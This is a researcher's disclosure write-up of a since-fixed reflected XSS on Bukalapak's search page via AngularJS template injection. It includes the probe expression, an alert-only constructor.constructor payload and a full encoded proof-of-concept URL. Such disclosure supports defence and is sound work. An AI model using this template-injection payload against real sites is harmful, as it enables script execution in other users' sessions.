Reflected XSS On Search Product via AngularJS Template Injection [ Bukalapak.com ]

Description :

I’ve found Reflected XSS on www.bukalapak.com via AngularJs , I found this by write {{31338-1}} on their search page and found result 31337 . And i also read h1 report from ysx  for my reference to exploit this.

And I use payload from ysx to exploit AngularJS with {{constructor.constructor(‘alert(document.domain)’)()}} payload.

POC (Piye Om Carane ):

  1. login to account
  2. insert the payload to search field
  3. and XSS will fire up

POC URL :

https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D

Screenshoot :

It fixed 1 day after I report to them.

Reference :

  1. https://hackerone.com/reports/230234
  2. http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Note: I got permission to disclose this report from bukalapak

For Indonesia Languange, you can see my original report on : https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3

Thanks!